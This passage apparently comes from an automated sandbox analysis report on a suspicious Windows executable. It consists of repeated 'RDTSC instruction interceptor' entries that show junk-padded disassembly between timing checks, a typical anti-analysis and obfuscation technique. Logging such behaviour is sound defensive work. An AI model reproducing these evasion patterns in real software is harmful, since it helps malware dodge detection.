9A5FCAE0h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F1CC8B8C9F6h 0x0000005d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9D6E second address: BE9DBA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CC8BB7C3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 25A03520h 0x00000011 call 00007F1CC8BB7C3Fh 0x00000016 mov edi, ebx 0x00000018 pop esi 0x00000019 lea ebx, dword ptr [ebp+1244EB16h] 0x0000001f mov edx, dword ptr [ebp+122D2A8Fh] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1CC8BB7C44h 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9DBA second address: BE9DBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9E27 second address: BE9E8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov si, 4AA3h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1CC8BB7C38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push ebx 0x0000002e sub ecx, 4BBD619Bh 0x00000034 pop esi 0x00000035 xor cx, 5FDEh 0x0000003a call 00007F1CC8BB7C39h 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pop edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b jmp 00007F1CC8BB7C3Eh 0x00000050 pop ecx 0x00000051 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9E8B second address: BE9EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F1CC8B8C9E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9EBh 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9EA8 second address: BE9F3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F1CC8BB7C36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f je 00007F1CC8BB7C4Bh 0x00000015 jmp 00007F1CC8BB7C45h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F1CC8BB7C40h 0x00000025 jmp 00007F1CC8BB7C3Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2B0Fh] 0x00000032 push 00000003h 0x00000034 ja 00007F1CC8BB7C39h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F1CC8BB7C38h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 stc 0x00000057 push 00000003h 0x00000059 mov ecx, dword ptr [ebp+122D2CBCh] 0x0000005f push C46FF89Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9F3B second address: BE9F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BE9F3F second address: BE9F49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C08222 second address: C0822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C08374 second address: C0837A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0837A second address: C0837E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0837E second address: C08384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C08384 second address: C0838A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0838A second address: C08394 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C084DC second address: C084F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1CC8B8C9E6h 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C084F9 second address: C08507 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1CC8BB7C3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C087CD second address: C087D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C08CB9 second address: C08CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1CC8BB7C3Eh 0x0000000a jne 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C09223 second address: C09240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C09358 second address: C0935C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0935C second address: C09367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C096BB second address: C096C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D86E second address: C0D889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D889 second address: C0D8A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C3Dh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8A7 second address: C0D8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8AD second address: C0D8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8BA second address: C0D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8C0 second address: C0D8C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8C8 second address: C0D8D2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BD712A second address: BD713C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BD713C second address: BD7140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0FF7D second address: C0FF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0FF81 second address: C0FF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1051D second address: C10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10521 second address: C10527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10527 second address: C10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10537 second address: C1053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1053B second address: C1054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1054B second address: C10553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10553 second address: C10575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C46h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1062F second address: C1065E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9F7h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1065E second address: C10675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10675 second address: C1068C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1068C second address: C10690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BDA825 second address: BDA832 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1571B second address: C15720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C15720 second address: C15740 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1CC8B8C9F2h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C159BB second address: C159C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C168CB second address: C168D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C16C8F second address: C16C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C16C93 second address: C16C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C175D5 second address: C175FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F1CC8BB7C40h 0x00000012 nop 0x00000013 js 00007F1CC8BB7C44h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C175FD second address: C17601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17601 second address: C17622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1CC8BB7C48h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17622 second address: C1762C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1797B second address: C17981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17BE3 second address: C17C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F1CC8B8C9ECh 0x0000000c jnp 00007F1CC8B8C9E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 jp 00007F1CC8B8C9ECh 0x0000001b pop eax 0x0000001c nop 0x0000001d mov esi, 2EC9228Ah 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17C11 second address: C17C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007F1CC8BB7C43h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17C3F second address: C17C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C19165 second address: C19169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C19169 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CC8B8C9ECh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1A92F second address: C1A933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1CEE5 second address: C1CEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1CEE9 second address: C1CF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 2809FB73h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D25D0h], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D20DEh], edi 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 jmp 00007F1CC8BB7C3Fh 0x0000002b pop esi 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1E4EB second address: C1E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1E4EF second address: C1E4F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2359F second address: C235AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1CC8B8C9E6h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235AD second address: C235B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235B1 second address: C235BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235BD second address: C235C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235C6 second address: C235CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245A1 second address: C245A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245A5 second address: C245AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245AB second address: C245B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C256FC second address: C25735 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1CC8B8C9F4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1CC8B8C9F9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C25735 second address: C25739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C24728 second address: C24749 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F1CC8B8C9E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CC8B8C9F2h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2789B second address: C2789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2789F second address: C278E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+122D2BD7h] 0x00000015 push 00000000h 0x00000017 jng 00007F1CC8B8C9ECh 0x0000001d adc ebx, 1A3DFF34h 0x00000023 mov edi, dword ptr [ebp+122D2C9Dh] 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jng 00007F1CC8B8C9E6h 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C269CB second address: C26A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F1CC8BB7C48h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F1CC8BB7C38h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F1CC8BB7C42h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F1CC8BB7C38h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 clc 0x00000056 sub edi, dword ptr [ebp+1244D89Eh] 0x0000005c mov eax, dword ptr [ebp+122D12F9h] 0x00000062 mov dword ptr [ebp+124723E8h], ebx 0x00000068 push FFFFFFFFh 0x0000006a mov ebx, ecx 0x0000006c nop 0x0000006d jmp 00007F1CC8BB7C40h 0x00000072 push eax 0x00000073 pushad 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C278E6 second address: C278F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C278F5 second address: C2790C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
